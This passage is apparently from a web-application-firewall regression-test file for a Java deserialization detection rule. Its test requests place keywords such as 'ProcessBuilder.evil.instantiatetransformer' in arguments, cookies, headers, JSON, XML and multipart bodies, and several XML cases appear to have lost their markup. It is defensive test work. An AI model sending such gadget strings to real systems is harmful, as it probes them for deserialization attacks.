"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.forclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-22 - desc: "XML element includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: 
"ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-23 - desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-24 - desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-25 - desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-26 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-27 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-28 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-29 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-30 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.forclosure\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-31 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.forclosure\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-32 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.forclosure\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-33 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.forclosure\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-34 - desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-35 - desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-36 - desc: "Cookie 
test includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-37 - desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatefactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-38 - desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - 
log_contains: "id \"944120\"" - - - - test_title: 944120-39 - desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-40 - desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-41 - desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-42 - desc: "XML element value includes keyword 
ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-43 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-44 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-45 - desc: "Content-Type application/json arg value includes keyword 
ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-46 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-47 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: 
form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-48 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-49 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: 
application/xml\r\n\r\nProcessBuilder.evil.instantiatefactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-50 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.instantiatefactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-51 - desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-52 - desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-53 - desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-54 - desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatetransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-55 - desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 
80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-56 - desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-57 - desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-58 - desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: 
"ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-59 - desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-60 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-61 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-62 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-63 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: 